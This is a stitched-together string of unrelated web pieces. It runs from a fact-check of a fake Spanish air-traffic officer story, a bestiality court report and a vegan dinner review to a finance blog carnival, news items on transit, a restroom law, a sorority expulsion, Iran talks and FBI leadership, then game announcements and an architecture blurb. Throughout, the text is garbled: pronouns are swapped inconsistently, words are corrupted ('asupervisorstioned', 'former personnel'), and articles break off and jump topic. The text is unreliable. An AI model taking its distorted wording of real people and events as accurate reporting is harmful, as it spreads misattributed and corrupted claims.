Lies: Spanish Flight Operations Officer from Kiev Informed about Ukrainian Planes Involved in Boeing Tragedy
July 17 Russia Today quoted some Carlos, who is claimed to be a Spanish flight operation officer allegedly working in Kiev airport «Borispol».
According to the asupervisorstioned Carlos, Ukrainian jet fighters were in air near the Boeing when it disappeared. They posted this information on Twitter (a repost from Russia Today can be found there as well).
Their account https://twitter.com/spainbuca is no longer active at the moment. It is inaccessible, though it remains in search engines cache.
Yet, the Ukrainian State Air Traffic Services Enterprise has informed StopFake that they do not have a flight operations officer with such name among their workers. Aleksei Pesternikov, deputy CEO of the Ukrainian State Air Traffic Services Enterprise has confirmed that all flight operations officers in the company are citizens of Ukraine.
Also, according to the Methodological recommendations on organisation and appointment of candidates for flight operations officers training, , only citizens of Ukraine can be trained (paragraph 2.3, subtitled «Citizenship»). In other words, a citizen of another country cannot be allowed to participate in the training, they would not be able to receive the license, without which it is impossible to work as a flight operations officer in Ukraine.
The Ukrainian citizenship is also mentioned the rules for certification of the aircraft staff in Ukraine, approved by the Ministry of Transportation and Communication (paragraph 4.26).
The Carlos story can also be found on Beforeitsnews.
Our readers know about this website from the RAND story, which StopFake reported earlier. The news was allegedly about the document which confirmed the American assistance in military strategy in Ukraine.
A Bethlehem man admitted today to raping a dog last year in Allentown.
“My decision was to plead guilty because, if not, we would go to trial,” Juan Sanabria-Hernandez, 27, said through an interpreter. “I am the most remorseful for what I did.”
Under a plea deal before Lehigh County Judge Maria Dantos, Sanabria-Hernandez, who was wearing a striped polo shirt, jeans and sneakers, pleaded guilty to sexual intercourse with an animal.
They were sentenced to 18 months of probation. In exchange for the plea, a charge of animal cruelty was dropped.
Prosecutors said Sanabria-Hernandez raped a female Shih Tzu named Star on Oct. 18 in Allentown. The dog's owner, Angela Rivera, noticed the dog had physical injuries that night and confronted Sanabria-Hernandez, who had been watching the animal, the next day, according to court records.
“He told them they had, in fact, had sexual intercourse with their dog,” Lehigh County Deputy District Attorney Matthew Falk said.
Rivera called police and Sanabria-Hernandez confessed to police, prosecutors said.
Attorneys on both sides of the case cited Sanabria-Hernandez's “limitations” that “go a long way in explaining their behavior,” defense attorney Irene Johns said.
Johns said a psychological report noted Sanabria-Hernandez is not a risk to others and they will continue to maintain treatment with their intensive case manager.
“He has clear mental health issues. They need to be supervised. That would be our concern,” Falk said.
The Sunday of Labor Day weekend, after working the brunch shift at work, I came home, showered and trekked to NoDa. I had RSVP'd to As You Do II Vegan Pop-Up a while back after my friend Cece had told me how great it was. Naturally I immediately bought a ticket as soon as I heard they had announced a date. The pop up dinner was held at Chef Shawn Harrison's parents' business, Photographic Elegance, Inc.
I skillfully found a parking spot on North Davidson Street, which is always the most delightful of tasks and walked up to the door of the building. To get in, you rang a doorbell and someone would come and open the door for you. Fancy. I walked into the most intimate room. I must admit, it was not what I was expecting, but I loved the vibe. I sat down at a black linen lined table with three people I've never met before. Sounds daunting, but it was quite enjoyable to talk and joke around with three strangers, getting to know a little bit about each other, one dish at a time.
Our night started out with Brian Williams, better known as “Chef Cat” greeting our small group of about 12 people. He's super charismatic and exudes passion about what they do. Passion like that is invigorating, contagious if you will. I couldn't wait to eat everything they had just described.
Wine was poured and out came a little appertif to start our palates off.
Cantaloupe Cube: Curried Bell's Best Berries Papalo Puree. Lemongrass Candied Star Anise.
Wow, was this a spoonful of flavor to the face. The curry was definitely noticeable, but not too overpowering. It went perfectly with the sweetness of the cantaloupe. Oh, and can we just talk about that candied star anise?! It wasn't edible, just meant to be kind of savored in the mouth for flavor. At this point, I was excited. Game on.
Our next course kicked things into high gear, literally.
Pickled Coto Family Farms Ali Baba Watermelon Rind. Compressed Watermelon. Jalapeno Mint Juice. Tellicherry Peppercorn Candied Orange. Tega Hills Arugula Micros.
This salad was so light yet full of flavor. By compressing the watermelon, the flavor was so enhanced. It was all about the sweet and spicy in this dish. The jalapeno juice definitely packed a punch and the peppery arugula was a great match to all of the flavors dancing around on the plate.
The third course sounded so tantalizing as soon as it was described to us, that I could not wait to taste it. The aroma of this specific course being prepared didn't help either.
Whisky Maple Glazed Sweet Potato Plank. Bitter Herb Salat. Rosemary Smoked Macadamia Yogurt. Wild Flowers. Ash Flat Bread.
This was a close second to my favorite dish of the night. The sweet potato was actually a Korean white yam, which added a unique flavor to this dish. The bitter greens in the salad were fresh collards. They combated the sweetness very well. Now let's have some real talk, and let me tell you why this was one of my favorite dishes. THAT YOGURT. Holy delicious. Everyone of us at my table just about licked the plate because of it. I've never tasted anything like it. I told Chef Cat that they needed to sell that and they laughed and told me it was too expensive. But seriously I don't care how much it is, I'd buy it.
After that dish, we were given a glass of hibiscus ginger water. I wasn't sure if I'd like this, but it, like everything else, surprised me! It was great! A little tart, a little sweet and the ginger had a nice, subtle spiciness to it that kept me coming back for more.
As I was sipping on my hibiscus ginger water, I thought to myself that I wasn't sure anything would beat that previous dish. I mean, even as the fourth course was being walked to my table, I was still thinking about that dang yogurt. I was wrong.
Overnight Coto Family Farms Heirloom Tomato Ratatouille. Caramelized Fennel. Charred Sweet Onion Jus. Tree Nut Ricotta. Tarragon Crispy Fried Shallots. Lemon Oil.
So, so wrong. In fact, this ended up being my hands down, favorite dish of the night. How'd that happen?! This was just my kind of food. It was jam packed full of flavor, yet so comforting. I may be biased due to the fact that I was already a huge fan of ratatouille, but this may have been one of the best I've ever had. That jus was so delicious, I wish I would have had some bread to sop it all up with. Also the cheese that wasn't really cheese was, dare I say, almost better than fresh ricotta cheese? So good. I'll be spending my days and night trying to figure out how to make tree nut cheese now.
At this point, I probably could have stopped here and been happy. Then I looked to my left to the kitchen and saw the desserts being plated, and suddenly I wasn't so full after all.
Champagne Nectarine Panna Cotta. Cinnamon Orange Candy. Raspberry Port Ice Cream. Blackberry Coulis. Toasted Almond ‘Crumble'.
Well this was a delightful finish to the evening. I was instantly amazed at how the chefs managed to make a panna cotta and ice cream that darn good and keep it completely vegan. Chef Cat came over and told us a bit of their process about the ice cream and I was amazed. I never would have thought of this. Geniuses. All of them.
I am inclined to tell you that I am not a vegan. Even though I do not follow a strictly plant based diet, I thoroughly enjoyed this dining experience. The thought and passion that went into these courses were beyond anything I could have ever imagined. As Chef Cat said, “You can really do a lot with plants.” I can honestly say I did not miss the meat at all and was actually quite full. Chef Shawn and Chef Cat are without a doubt transforming people's perception of vegan food. It doesn't have to be boring. It doesn't have to be just a salad. The possibilities are endless. The world is your oyster. I really think that they can fill a void in Charlotte with this type of progressive, plant based dining experience. I'm looking forward to seeing what else these guys have up their sleeves. Be on the lookout Charlotte, they're coming for you.
What's next for Chef Cat: They will be putting on a raw dinner with their brand, Terra Flora next month. Details: TBD.
What's next for Chef Shawn:  They are the VIP chef of DamFest 2015. Be on the lookout for their work with Tephra as well.
Within the next five years, the South Korean Ministry of Science, ICT and Future Planning intends to invest 10 billion won ($8.65 million) in a system offering virtual currency for human wastes.
The project created at the Ulsan National Institute of Science and Technology (UNIST) uses a waterless toilet system that converts human feces into a dehydrated odourless material to be used for biodiesel or heat energy.
Participants of the project, or better say, donors, would be rewarded with the virtual currency called kkul (‘honey' in Korean).
A single donation of human wastes would typically cost 10 kkul ($0.43). A special smartphone application would determine the exact price of every dump. The virtual money might then be spent in the supermarkets or restaurants that receive payments in kkul.
“Our ultimate goal is not only for the new toilet system to save water and operational costs for wastewater treatment plants, but for us to establish an ecosystem that supports technology innovation and drives economic diversification where human waste literally has a financial value,” Professor Cho Jae-won, director of the Science Walden Pavilion laboratory, told CCN.
The South Korean government is interested in the implementation of such toilet system across the country to support disadvantaged groups of society.
“We'll be suggesting a whole new paradigm for city design, and prove the potential of an environmental economic system with a feces-energy-life cycle,” Cho Jae-won added in an interview with Seoul Economic Daily.
Elena Platonova
Image via The Korea Bizwire
Carnival of Personal Finance #317 – The Harry Potter Edition
Welcome to the Carnival of Personal Finance #317! It's my first time hosting this wonderful carnival and I hope you enjoy the great articles selected.
Ten years after the first Harry Potter movie, the last one in the series is being released this week so I thought it fitting to pay tribute to the series which has already grossed $6 billion dollars. The author, J.K. Rowling, went from collecting social benefits to a billionaire according to Forbes Magazine.
Harry Potter does have a lot to do with money! (If you're reading this via email, you may have to visit the website to see the trailers.)
The Sorcerers Stone (Editor's Picks)
We meet Harry Potter as they learn he's a wizard and goes to Hogwarts for year 1. Have fun refreshing your memory before the final movie and seeing the characters grow up.
As a baseball fan, I thoroughly enjoyed Three Personal Finance Lessons from the Dodgers' Bankruptcy Debacle from Bryan at Pinch that Penny! The lessons apply to your career as well.
James Clear from Passive Panda presents 99 interview tips that will actually help you get a job. This is a great resource for any job hunter.
Most of us use credit cards, but I bet this article by Len from Len Penzo Dot Com on18 Amazing Facts You Didn't Know About Your Credit Card teaches you something new.
Paula from Afford Anything presents Quit your Job, Travel, and Live Remarkably. She's an inspiration for anyone that wants to live outside the box.
The Chamber of Secrets
Echo from Boomer & Echo presents Are Rewards Cards Costing You Money?, and says, “I am a big fan of using rewards cards to help save money on my everyday spending, but can reward cards actually be costing you money?”
Jeff Weber from Smart Balance Transfers presents Three Ways I Learned to Save Money with Credit Cards, and says, “An overview of how I went from a credit card loser to a credit card winner and the three steps I followed.”
Glen Craig from Free From Broke presents Southwest Airlines Rapid Rewards® Premier Credit Card | Review, and says, “Want to maximize your spending for free flights on Southwest Airlines? See how to earn free flights and more in this credit card review.”
Nathan Richardson from ComplexSearch presents What is a Great Credit Score?, and says, “When people need to finance a home or a car, people often wish they had a higher credit score. With a great credit score people can get low interest rates, which can save you thousands of dollars.”
The Prisoner of Azkaban
Donna Freedman from Surviving and Thriving presents Dumpster wading, and says, “Some people are dumpster divers. I'm more of a dumpster wader. I'm not willing to climb in and get dirty, or to risk injury. But anything I can reach, I'll harvest.”
Money Beagle presents Clean Off That Air Conditioning Unit, and says, “Don't forget this one important task this summer!”
Annabelle from The Year of Shopping Detox presents Why being single is more expensive, and says, “It's hard out there for all the single ladies, when everything's cheaper to buy for a family or as 2a couple.”
Amanda L Grossman from Frugal Confessions presents Woe to the Lean Purse: Ways to Fix It, and says, “I take a look at The Richest Man in Babylon's strategies to curing a lean purse, and add an action step to each so that we can all start implementing these techniques today.”
Jacob from My Personal Finance Journey presents What Motivates You To Be Financially Responsible?, and says, “There are two things that keep me motivated to be fiscally responsible beyond all else – 1) keeping aligned with my Purpose Focused Financial Plan and 2) Updating my net worth and asset allocation each month. This article describes each of these in detail.”
The Goblet of Fire
Nelson from Canadian Finance Blog presents Investing Ethics, and says, “Each and every one of us make decisions that wrestle with ethics. But what about investing ethics? Should you let your morals decide your investments?”
Jeff Rose from Good Financial Cents presents How Much Should You Really Save For College, and says, “If you have questions about the cost of college tuition and how much you should be saving you need to read this article.”
Div Guy from The Dividend Guy Blog presents How To Build a 6-Figure Income Dividend Portfolio with $600 per month, and says, “How you can start working on your dividend portfolio.”
Outlaw from Outlaw Finance presents Can You Contribute to a Roth IRA and a 401K?, and says, “Shares my experience of simultaneously contributing to a Roth IRA and 401K, as well as the requirements you'll need to meet in order to do the same.”
Ginger Lasky from Frugal Students- Starting a New Life presents A trick to pay less interest on student loans, and says, “This is an easy trick that students, or their parents, can use to save money on student loans while not decrease the amount they are taking.”
Harri Pierce from TotallyMoney presents Top 10 travel insurance tips.
The Order of the Phoenix
Amanda from My Dollar Plan presents Kids and Money: A Summer Job for Our Niece, and says, “A great idea for teaching kids about earning and saving money!”
Lindy from Minting Nickels presents Taking a Trip with Multiple Mes, and says, “Shopping for a vacation hotel can be a confusing experience for someone with multiple spending personalities (like me). ”
md from Passive Income Now presents Why Launching An eBook is Not Passive Income, and says, “A look at the hard work involved in creating an eBook.”
Nicole from Nicole and Maggie: Grumpy Rumblings presents Are you doing better than your parents?, and says, “Does the advice not to seek your parent's standard of living when you're on your first job seem like good advice or unnecessary? Did you seek their standard of living (or better) before you could really afford it?”
Cathy Moran from MoneyHealthCentral presents Entrepreneur Is Another Word For Utility Player, and says, “Being a small business owner means you play many positions.”
Bob from Christian Finances presents Lessons Learned From Throwing Money Away, and says, “I couldn't believe it. I was actually digging through the trash for money this week.”
Big Spender from Debt Broke presents Use Facebook and Twitter to Cut Your Debt.
The Half-Blood Prince
Jen from Master the Art of Saving presents Some Spending is Non-negotiable! Any Compromises?, and says, “While the large sums (spending or saving) make a big difference in our finances, we often overlook the small things that can add up.”
Pat S from compounding returns presents First 3 Steps in Debt Recovery, and says, “Start climbing out of debt with these first 3, most important steps.”
Junior Boomer from Consumer Boomer presents Is It Better to Save or Repay Debt?, and says, “Here's a quick look at the benefits and drawbacks of focusing on saving or repaying debt.”
FMF from Free Money Finance presents How Getting a New Credit Card Impacts Your Credit Score.
Mike from Green Panda Treehouse presents How Daily Savings Add up to Thousands of Bucks, and says, “Saving up money on a daily basis.”
Mike from Experiglot presents Diversify Everything You Can When it Comes to Money, and says, “Getting control of saving your money.”
Big Cajun Man from THE Canadian Personal Finance Site presents Debt is Like Teenage Sex, and says, “No, I am not saying everyone talks about it, but none of them know what they are doing, but that isn't a bad analogy either!”
The Deathly Hallows Part 1
Crystal from Stupid Cents presents A Simple Resume Can Get You the Job, and says, “One of the ways that you can land a job is by having a simple resume format. A concise, and well-crafted resume will speak for you in a great way.”
Mike from The Financial Blogger presents Extra Income For Hands On People, and says, “How you can make extra cash right now.”
Darwin from Darwin's Money presents College Degrees that Leave You With Debt for Life, and says, “Here are several cases of college degrees that have left students with debt for life. It's critical to consider ROI on your college degree before choosing a major.”
md from Studenomics presents Help a Reader- Leave Country For Work or ?, and says, “Several readers chime in with career advice for a fellow reader.”
Shaun from Money Cactus presents Sometimes its not what you know, and says, “Having great credentials will help you get a new job, but often it comes down to who you know, not what you know. Here's how I recently made it work for me and you can too”
The Deathly Hallows Part 2
Jim Yih from Retire Happy Blog presents Predictions for Real Estate Prices: Boom or Bust?, and says, “Not a day goes by these days without someone predicting what is going to happen to real estate prices. Here's my prediction . . .”
Money Thinker from Money Thinking presents Prices are Rising on these 5 Food Staples, and says, “Money Thinker shares 5 food staples that are getting a littler pricier this summer. ”
ElizabethG from Modern Gal presents Mid-Year Financial Checkup.
Gen Y Capitalist from Gen Y Capitalist presents Cutting Expenses Without Sacrificing Quality of Life, and says, “In this article, I discuss why saving doesn't necessarily result in lifestyle sacrifices.”
Philip Taylor from PT Money Personal Finance presents Pay Cash or Finance a Car?, and says, “Discusses the mathematical and emotional aspects to consider when paying cash or financing a car.”
Philip from Outlaw Finance presents How to Pay for College Without Loans, and says, “Some ideas for avoiding the monster of student debt.”
That's it for this week's carnival. Thanks for reading and let me know what you think of the Harry Potter movies. Next week's carnival host is my blog conference buddy, Danielle Liss, from Kitten A Go-Go. You know it'll be fun!
Put a big circle around March 5, 2016, folks, because that's the day that the Gold Line Foothill Extension is scheduled to open for business. The 11.5-mile project will take trains from the Pasadena station that today serves as the end of the Gold Line to new stops in Arcadia, Monrovia, Duarte, Irwindale, and Azusa (where there'll be a stop in downtown and another near Azusa Pacific University and Citrus College).
If there's one partial bummer in all this, it's that trains are only expected to run every 12 minutes during peak hours, which is double the peak-hour train headways on the Gold Line now. That's because of a train car shortage, due to the Expo Line and Gold Line both opening extensions in the same year. It's expected that as more cars roll off the production line, the trains will begin to run more frequently. And still, once riders are on the train, it's a smooth, roughly 50-minute ride from the end of the line to Downtown, and that's not something that often (ever) happens during rush hour for drivers on the adjacent 210 Freeways.
· Gold Line to Azusa to open March 5; Ten things to know about the Foothill Extension [The Source]
· There Might Not Be Enough Trains for the New Gold and Expo Line Extensions to Open on Time [Curbed LA]
Beginning in March, all single-occupancy public restrooms in the state must be open to all genders. California is the first state with such a law.
California today became the first state in the nation to adopt legislation requiring that all single-occupancy restrooms in California businesses, government buildings, and other places of public accommodation be open to all genders.
Gov. Jerry Brown today signed the legislation, Assembly Bill 1732, into law, as it had been approved by both the state Assembly and Senate. It will take effect March 1, giving the Golden State “the nation's most progressive restroom access law,” notes a press release from the Transgender Law Center.
Several cities have such laws, according to the legal group, including Philadelphia, Austin, Seattle, San Francisco, New York City, Washington, D.C., and Santa Fe, N.M. Many colleges and universities, including the University of California system, also have similar policies, and some private businesses have put inclusive measures in place — management of the Sacramento Kings NBA team recently announced that the team's new stadium, the Golden 1 Center, will include all-gender restrooms, and Target is putting gender-neutral facilities in all its stores. But California has the first statewide law.
“California is charting a new course for equality,” Assemblyman Phil Ting, the bill's author, said in the press release. “Restricting access to single-user restrooms by gender defies common sense and disproportionately burdens the LGBT community, women, and parents or caretakers of dependents of the opposite gender. Bathroom access is a biological need. This law will ensure more safety, fairness, and convenience … for everyone.”
The legislation won praise from activists for transgender equality and women's rights. “This law is a simple measure that will make everyone's lives easier,” said Kris Hayashi, executive director of the Transgender Law Center. “Having restrooms open to all genders will mean less hassle for everyone going about their day and will allow people who don't fit neatly into expectations of what it looks like to be male or female to use the restroom without fear of harassment.”
One such person, Sara Rosenfeld, had spoken at a press conference in support of the legislation and commented further in the law group's press release. “For my whole life, public restrooms have been places of fear, anxiety, and danger for me — just because I don't fit people's expectations of what a woman should look like,” said Sara Rosenfeld, a 44-year-old Berkeley resident. “As a queer, black, more masculine-looking woman, I am constantly questioned and harassed when I use the bathroom. AB 1732 is a simple but important law that would help cut down on the fear and harassment I face every day.”
Ting said there was some opposition to the bill from social conservatives, but the strongest objection came from people asserting that “men don't seem to be able to use the bathroom without making a mess,” as they told Time. But restroom users will just have to avoid making messes, they added.
Businesses and governments won't have to spend much to implement the law, Time reports. All they will have to do is change their signage, estimated to cost about $40 per restroom.
The bill had the support of the Transgender Law Center, LGBT group Equality California, and the California branch of the National Organization for Women.
The California measure contrasts starkly with North Carolina's House Bill 2, passed in March, which bars transgender people from using the restrooms that match their gender identity, when those are located in government buildings, including public schools and state universities. North Carolina has seen a backlash over the law, with the NBA pulling its 2017 All-Star Game from the state and businesses canceling planned expansions. HB 2 also prevents cities and counties from adopting or enforcing LGBT-inclusive antidiscrimination ordinances or setting a minimum wage higher than the state's.
Legislation aimed at restricting trans people's restroom access was introduced in several other states this year and last without success. In March, South Dakota's governor vetoed one that would have affected students in public schools, and a similar measure in Tennessee was withdrawn by its sponsor in April, although they vowed to bring it back next year. But more than 20 states are suing the U.S. Department of Education because of a guidance document — nonbinding — advising schools to let trans students use the restrooms and locker rooms appropriate for their gender identity.
A Nebraska college student says they have been kicked out of their sorority because of a 'provocative' picture posted on their Tinder profile eight months ago.
Shannon Workman, a junior at the University of Nebraska Omaha, and their mother found the picture innocent - it showed them standing next to two girls as they all wore Bid Day shirts that read 'Sweet Home Chi Omega.'
However their sorority, Chi Omega, reportedly described it as 'risque' and told Workman the photo violated the sorority's Human Dignity rule, and the 20-year-old was ultimately kicked out.
Scroll down for video
University of Nebraska Omaha student Shannon Workman said they were kicked out of their sorority because of a 'provocative' picture (shown above) posted on their Tinder profile eight months ago
Workman (pictured as they became emotional during an interview) had been a member of the sorority for three years before they were kicked out last week
'There's nothing provocative about the picture whatsoever. It's in very good taste and not risque. It's ridiculous,' Workman's mother, Jill, told WOWT.
Workman, who had been a member of the sorority for three years before they were kicked out, had posted the picture on their Tinder profile in August.
'It was me at Bid Day wearing the outfit they gave us,' they told the station.
But last week, their sorority called them in for a meeting with its new executive board during which they were told they had violated its Human Dignity rule.
According to the rule, it states sorority sisters would not post photos wearing their letters on platforms that would bring 'disrespect to the chapter,' their mother told the New York Daily News.
Workman had reportedly already removed the picture from their profile on Tinder, so they as not sure why they were still in trouble.
'There's no way they could read that rule and see it apply to Tinder,' Mrs Workman said. 'It's not different from Facebook or any other site.'
The college junior (right) and their mother, Jill (pictured left), found the picture to be innocent, but they said Chi Omega found it 'risque' and told Workman the photo violated the sorority's Human Dignity rule
On Facebook last week, Workman's mother wrote of how their daughter was kicked out of their sorority and said they are proud of their daughter for sticking up for themselves
Mrs Workman said after the photo had appeared on their daughter's profile for eight months, how it 'suddenly' became a problem, calling the ordeal 'ridiculous', according to WOWT.
When they were initially contacted by their sorority, they said they started questioning them about what rule they had broken.
So when they were told to come in for a former personnel, they said they had a feeling that something was going to go wrong.
As they met with the executive board, they recorded the meeting on their phone in which they can be heard telling the board they do not see where they are in the wrong.
A person who appears to be a board member at one point is heard telling Workman they are receiving a combative attitude and disrespect from her, WOWT reported.
'We've asked you multiple times do you see where this is in violation and you keep saying no. So that tells me that you do not...' a person is heard saying before Workman interrupts stating, 'I was just being honest.'
'That's okay and that's great,' a woman is heard saying.
'If I'm going to get kicked out for that then let it be,' Workman then says.
Later in the conversation, Workman asks if the sorority has a 'hit list of people' they are trying to get out of the chapter, to which a person responds no.
Workman and their mother pictured above. The two other girls standing next to Workman in the picture in question, their big and their little, have reportedly since left the sorority
Workman, a cheerleader at the university for two years, is no longer a Chi Omega and their mother said they told them 'I'm never coming back' after they left the meeting
'I don't understand this. Out of all the people in the chapter I'm the only one getting kicked out because I'm standing up for what I believe in,' Workman is heard saying through tears.
'What you believe in doesn't align with what we believe in,' a woman is heard saying in response.
Workman walked out of the meeting no longer a Chi Omega and their mother said they told them 'I'm never coming back,' according to the New York Daily News.
The two other girls standing next to them in the picture, their big and their little, have reportedly since left the sorority.
Former Chi Omega member, Lacey McPhail, wrote on Facebook that they were 'forcibly kicked out' of the sorority and that they know at least 10 other girls who were forced to resign their membership.
'I am glad someone is speaking out about the corrupt goings on of this "Christian" sorority,' they wrote in a post last Monday.
Former Chi Omega Zeta Delta, Lacey McPhail, wrote on Facebook how they were 'forcibly removed' from the sorority and said that they are glad someone is speaking out 'about the corrupt' things on on of this 'Christian' sorority
'Since I have been removed I know of at least 10 other girls who have been removed for dating profiles, liking tweets/statuses, going to a party, and similar, very common college activities.
They continued: 'This sorority is not run by the active members but instead by the advisors, they have a complete dictatorship over what the girls can wear, post, and say.'
Dustin Wolfe, the Assistant Director of Fraternity and Sorority Life, at the university said in a statement to WOWT that the incident is a 'personnel matter' of a social organization.
Chi Omega's national chapter did not respond to the New York Daily News and WOWT requests for comment.
Israeli PM calls for sanctions and says they will not allow 'ayatollahs with nuclear weapons' to threaten 'the Jewish people'
The Israeli prime minister, Binyamin Netanyahu, on Sunday called the proposed nuclear agreement with Iran "an exceedingly bad deal", as they intensified their campaign to convince world powers to toughen terms ahead of fresh negotiations this week.
"To give the most dangerous regime of the 21st century the world's most dangerous weapons is a big, big mistake," they told CNN.
Netanyahu said the deal would leave Iran with 18,000 centrifuges to enrich uranium. "They are not giving up one centrifuge, not one," they said.
"We've been around for about 4,000 years, the Jewish people, and we are not about to let ayatollahs armed with nuclear weapons threaten that," they said. They said it was "no secret" that many Arab leaders held the same opinion.
Netanyahu called for an increase in sanctions, a move which would have the support of many Republicans in Congress. "I think you should increase that pressure because it's finally working," they said. "And if you give it up now when you have that pressure and Iran doesn't take apart one centrifuge when you have that pressure, what leverage will you have if you ease the pressure? It just doesn't make sense."
Talks in Geneva between Iran and the so-called P5+1 – Britain, China, France, Germany, Russia and the United States – are set to resume this week. On Saturday, the Russian foreign minister, Sergei Lavrov, talked up the chances of a deal being reached. "Our common impression is that there is a very good chance that must not be passed up," they said.
On Sunday, President François Hollande, in Israel to meet Netanyahu, offered reassurance about France's tough stance on the Geneva talks. "France will not give way on nuclear proliferation," Hollande said, at a welcoming ceremony at Tel Aviv airport. "So long as we are not certain that Iran has renounced nuclear arms, we will keep in place all our demands and sanctions."
Western diplomats have said one of the sticking points to ending 10 years of sanctions is Iran's argument that its right to enrich uranium should be recognised. The US argues that Iran does not have that right under the nuclear non-proliferation treaty.
On Sunday, in an interview with the ISNA news agency, Iran's chief negotiator and foreign minister, Mohammad Javad Zarif, suggested that recognition of that right need not be included in any deal. "Not only do we consider that Iran's right to enrich is unnegotiable, but we see no need for that to be recognised as 'a right', because this right is inalienable and all countries must respect that," they said.
After their meeting with President Hollande, Netanyahu is scheduled to travel to Moscow to see the Russian president, Vladimir Putin, this week and then return to Israel to meet the US secretary of state, John Kerry, on Friday. Speaking on CNN, Netanyahu said it was clear that sanctions were working and Iran's economy was "on the ropes".
"The options aren't really a bad deal – and this is a bad deal – or war, there's a third option: sanctions. Increase the sanctions," they said.
Senators including John McCain have been calling for increased sanctions on Iran. This week McCain called Kerry a "human wrecking ball" over Iran. "I have never been more worried about the parameters of this deal," they said.
Netanyahu said they would prefer a diplomatic solution. "We need a good solution and that's the main point. The problem with a partial deal is you reduce the sanctions and in this case Iran is practically giving away nothing. I think it's a bad deal," they said.
A group of current and former FBI agents on Saturday endorsed former Rep. Mike Rogers (R-Mich.) to lead the FBI following the ouster of director James Comey.
“Chairman Rogers exemplifies the principles that should be possessed by the next FBI Director,” Thomas F. O'Connor, president of the FBI Agents Association, said in a statement.
The association cited Rogers' experience previously serving in the FBI in addition to their time in Congress to explain their endorsement.
“It is essential that the next FBI Director understand the details of how Agents do their important work," the statement continued. “Rogers' unique and diverse experience will allow them to effectively lead the men and women of the Bureau as we work to protect our country from criminal and terrorist threats."
“During their time in Congress they showed a commitment to confronting threats to our country in a nonpartisan and collaborative manner.”
ADVERTISEMENT
Rogers, who previously served as the chairperson of the House Intelligence Committee, briefly advised the Trump transition team in November on national security issues.
 They are reportedly being considered among a number of other candidates to potentially replace Comey, who was fired on Tuesday.
Other individuals under consideration include Sen. John Cornyn John CornynHillicon Valley: Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Senate plots to avoid fall shutdown brawl MORE (R-Texas) and Acting FBI Director Andrew McCabe, who were among four candidates being interviewed Saturday by Attorney General Jeff Sessions Jefferson (Jeff) Beauregard SessionsTrump says they haven't spoken to Barr about Mueller report Ex-Trump aide: Can't imagine Mueller not giving House a ‘roadmap' to impeachment Rosenstein: My time at DOJ is 'coming to an end' MORE and their deputy Rod Rosenstein.
Trump earlier this week caused shockwaves in Washington when they fired Comey, who had been leading the bureau's investigation into Russia's meddling in the U.S. presidential election and any potential ties between the Trump campaign and Russia.
The White House denied the FBI's Russia probe was behind Comey's dismissal, but Trump in an interview with NBC News cited investigations into Russia's interference in the election in explaining their decision to fire Comey.
Trump also said they planned to fire Comey regardless of a Justice Department recommendation, breaking with the official account offered by senior White House aides, who emphasized the recommendation in explaining the FBI chief's dismissal.
Sword Art Online: Lost Song and Sword Art Online Re: Hollow Fragment Director's Cut are coming to PlayStation 4, Bandai Namco announced.
Both titles are coming to the Americas and Europe, with the PS Vita version of Sword Art Online: Lost Song also en route.
Get details below.
Sword Art Online Re: Hollow Fragment (PS4)
Due out exclusively via PlayStation Network in summer 2015.
In Sword Art Online Re: Hollow Fragment, players will play as the main character, Kirito, and fight through all the levels of Aincrad to break free from being locked within the virtual game world. Players with save data from the PlayStation Vita version of the game on will be pleased to learn that some items from that game will be transferable to the PlayStation 4; additionally DLC from the PlayStation Vita title will be unlockable on the PlayStation 4 at a later date.
Sword Art Online: Lost Song (PS4, PS Vita)
Due out via retail and digital in fall 2015 with subtitles in English, French, Italian, German and Spanish.
With an original story based on the Alfheim Online realm including new and returning characters and exclusive environments, fans will be more than happy to spend more than 50 hours questing in the ultimate Virtual Reality universe! To make it even more exciting, Lost Song will feature all new Aerial Battles and plenty of customization features.
Fox News hosts have used the controversy surrounding Rowan County, Kentucky clerk Kim Davis to repeatedly hawk the new book from a man considered one of America's most extreme and prominent anti-gay hate-group leaders.
Tony Perkins is the president of the Family Research Council (FRC), an organization that has been labeled a "hate group" by the Southern Poverty Law Center for spreading damaging lies about gay people, including the myth that they are more likely to engage in pedophilia.
Perkins' latest book, No Fear, was published on September 8 and tells the stories of "young people who have taken a stand for Biblical truth," including Aaaron and Melissa Klein, the Oregon bakers who were fined after refusing to sell a wedding cake to a same-sex couple. The book is a collection of misleading culture war stories aimed at depicting conservative Christians as the victims of religious persecution by liberals.
That's a popular narrative on Fox News, so it's not surprising that the network has promoted the book repeatedly during its news programming, playing off the controversy surrounding Kim Davis, the Rowan County clerk who went to jail for refusing to issue marriage licenses to same-sex couples:
Fox's knee-jerk endorsement of Perkin's book is also self-serving: Perkins themselves admitted that many of the stories in No Fear were pulled from Fox's reporting.
Perkins and the Family Research Council have long benefited from their relationship with Fox News. Todd Starnes, the network's serially misinformed culture war reporter, regularly turns FRC press releases into national news stories, while FRC touts the network's reporting to reinforce its Christian persecution narratives about LGBT equality.
Perkins has also found a close ally in Fox anchor Megyn Kelly, who has hosted the hate group leader more frequently on their show than any other Fox News program has, regularly giving their anti-gay extremism a veneer of mainstream credibility.
With Fox News giving Perkins free airtime to promote their book, the network has become both a political and financial asset to one of the country's most extreme anti-gay hate groups.
Demarcon, thank you so much! The presents are amazing! I love the mug & the cute little box it came in. It's totally my style and something I would pick for myself. The food truck cookbook is also amazing. I love eating at food trucks. The cookbook even says where the trucks are located! It is by far the best cookbook I now own. My sister was here when the gifts arrived and we already went through it page by page and are excited about "attempting" to make some stuff. I love how you took my love of r/shittyfoodporn and bought me the food truck cookbook. Hopefully my attempts at cooking some of this stuff don't end up there! You are an amazing gift giver! Update: Today there was another package in my mailbox & it just so happens to be my birthday! thanks so much for the phone case, its adorable and it came on the perfect day. :D
+ 27
Text description provided by the architects. The Sunshine Canyon Residence was, in a way, created by the Fourmile Canyon Fire of 2010. The owners, who lost their home in that fire, wanted to rebuild near their original home site. Embracing the beauty of the burned landscape, they chose a steeply sloped southern facing site, also burned by Fourmile fire.
Following a long period of intensive mining exploration, the new site sat untouched for years prior to the fire. Abandoned mine shafts, rusted steel mining structures and car tracks, and mounds of mine tailings are scattered near the site. Directly below the home site lies a test pit for a mine that was never completed. Until the fire, these remnants were increasingly faint. The fire exposed this rich history as well as the sculptural granite that forms the site.
